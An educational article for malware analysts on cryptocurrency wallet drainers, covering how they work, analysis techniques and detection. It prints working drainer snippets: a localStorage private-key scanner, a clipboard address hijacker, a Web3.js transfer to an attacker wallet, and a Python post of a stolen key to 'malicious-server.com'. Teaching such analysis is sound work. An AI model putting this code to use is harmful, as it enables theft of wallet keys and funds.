Understanding Drainers: Analysis Techniques and Code Examples for Malware Analysts
Introduction
Drainers are a type of malicious software used by cybercriminals to steal funds or assets directly from digital wallets, typically targeting cryptocurrency. Unlike traditional malware, which often seeks persistence or ransom, drainers quickly extract assets from a wallet without requiring extended control over the target device. This article provides insights into drainers, analysis techniques, and example code for malware analysts to help identify and defend against this emerging threat.How Drainers Work
Drainers operate by exploiting weaknesses in digital wallets, applications, or browser extensions. They typically target cryptocurrency wallets, including MetaMask and other decentralized apps (dApps). Here’s a breakdown of the typical drainer attack process:- Initial Access and Setup
Drainers often spread through phishing, malicious links, or compromised websites. Some are embedded in seemingly legitimate applications or browser extensions. Once installed or executed, the drainer accesses wallet credentials or session data. - Credential or Session Theft
Drainers capture wallet private keys, seed phrases, or active session cookies. Some drainers also use clipboard monitoring to detect and intercept copied cryptocurrency addresses. - Transaction Execution
Once the drainer has access to the wallet, it creates and signs transactions that transfer funds to the attacker’s address. The transaction is executed in the background, often without user awareness. - Exfiltration and Covering Tracks
After draining funds, some drainers delete traces of their activity by clearing logs or closing sessions to minimize detection.
Drainer Analysis Techniques
Malware analysts can use various techniques to dissect drainer behavior, focusing on how these programs access sensitive wallet data and execute unauthorized transactions.- Static Analysis
Static analysis involves reviewing the drainer’s code for hardcoded wallet addresses, transaction functions, and suspicious API calls. Analysts can search for keywords such as “web3,” “eth_sendTransaction,” and other blockchain-related functions. - Dynamic Analysis
Dynamic analysis involves executing the drainer in a controlled environment to observe its behavior. This includes monitoring network activity to detect outbound connections to cryptocurrency addresses or transaction relays. - Network Traffic Analysis
Since drainers communicate with external blockchain nodes or API services, analysts can inspect network traffic for unusual activity. Monitoring traffic for outgoing HTTP/S requests to known cryptocurrency endpoints or WebSocket connections is helpful. - Reverse Engineering
For obfuscated drainers, reverse engineering helps uncover how they perform credential theft, access browser extensions, or interact with wallet APIs. Analysts can use tools like Ghidra or IDA Pro to disassemble code and trace sensitive functions.
Example Code Snippets for Drainer Analysis
Here are some example code snippets representing typical drainer functionalities, including accessing wallet data, executing transactions, and exfiltrating sensitive information.1. Stealing Wallet Private Keys
Some drainers attempt to locate and extract private keys directly from browser extensions or local storage. Here’s an example using JavaScript to access a browser’s local storage for potential wallet data:
JavaScript:
// Accessing browser local storage to search for wallet data
function findPrivateKey() {
let keys = [];
for (let i = 0; i < localStorage.length; i++) {
let key = localStorage.key(i);
if (key.includes("privateKey") || key.includes("seed")) {
keys.push(localStorage.getItem(key));
}
}
return keys;
}
let stolenKeys = findPrivateKey();
console.log("Stolen Keys:", stolenKeys); // Exfiltrate these keys laterAnalysis: This code iterates through localStorage to find any item that contains “privateKey” or “seed,” which are commonly used to store sensitive wallet information. Malware analysts look for suspicious access to localStorage or keywords like "privateKey" and "seed."
2. Intercepting Clipboard Data for Addresses
Drainers may monitor clipboard data to capture cryptocurrency addresses when users copy them. Below is a Python example that continually checks the clipboard for copied data:
Python:
import pyperclip
import re
import time
# Regex pattern for detecting an Ethereum address
eth_pattern = re.compile(r"0x[a-fA-F0-9]{40}")
def monitor_clipboard():
last_data = ""
while True:
data = pyperclip.paste()
if data != last_data and eth_pattern.match(data):
print("Captured address:", data)
# Replace with attacker's address
pyperclip.copy("0xAttackersWalletAddressHere")
last_data = data
time.sleep(1)
monitor_clipboard()3. Executing a Transaction Using Web3.js
Drainers use Web3.js to connect to the Ethereum blockchain and execute transactions. Here’s a basic example of sending an unauthorized transaction using Web3.js:
Python:
const Web3 = require('web3');
const web3 = new Web3('https://mainnet.infura.io/v3/YOUR_INFURA_PROJECT_ID');
// Replace with the victim's private key
const privateKey = '0xVictimsPrivateKeyHere';
const account = web3.eth.accounts.privateKeyToAccount(privateKey);
async function drainFunds() {
const tx = {
to: '0xAttackersWalletAddressHere',
value: web3.utils.toWei('0.5', 'ether'),
gas: 2000000
};
const signedTx = await account.signTransaction(tx);
const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);
console.log('Transaction receipt:', receipt);
}
drainFunds();Analysis: This code signs a transaction to transfer funds to the attacker’s address using the victim’s private key. Malware analysts might look for the presence of Web3.js libraries and calls to signTransaction() and sendSignedTransaction(), indicating blockchain transaction activity.
4. Sending Stolen Data to an External Server
After collecting sensitive information, drainers often exfiltrate it to a remote server. Here’s an example using Python’s requests library to send data to an attacker-controlled server:
Python:
import requests
def exfiltrate_data(private_key):
url = 'http://malicious-server.com/upload'
data = {'private_key': private_key}
response = requests.post(url, data=data)
return response.status_code
private_key = 'stolen_private_key_here'
exfiltrate_data(private_key)Detecting and Mitigating Drainers
To defend against drainers, malware analysts and security teams use various detection and mitigation techniques:- Behavioral Analysis for Wallet Access
Detecting unusual access to local storage or sensitive browser data can help identify drainers early. Analysts set up behavioral detection rules for accessing specific storage keys associated with wallet data. - Network Monitoring for Unauthorized Transfers
Network monitoring tools can detect attempts to connect with blockchain nodes or suspicious API endpoints. Setting up alerts for large or unusual transactions to known addresses is also helpful. - Anti-Clipboard Monitoring
Security tools can identify clipboard access requests to detect drainers attempting to hijack copied cryptocurrency addresses. Some endpoint protection solutions block unauthorized clipboard monitoring activities. - Blocking Known Malicious Wallet Addresses
Many drainers repeatedly use the same wallet addresses. Analysts can leverage threat intelligence feeds with known malicious wallet addresses to set up detection and alert rules. - Sandboxing and Dynamic Analysis
Drainers often modify browser settings or local storage, so running them in a sandboxed environment enables analysts to observe behavior without compromising real assets.
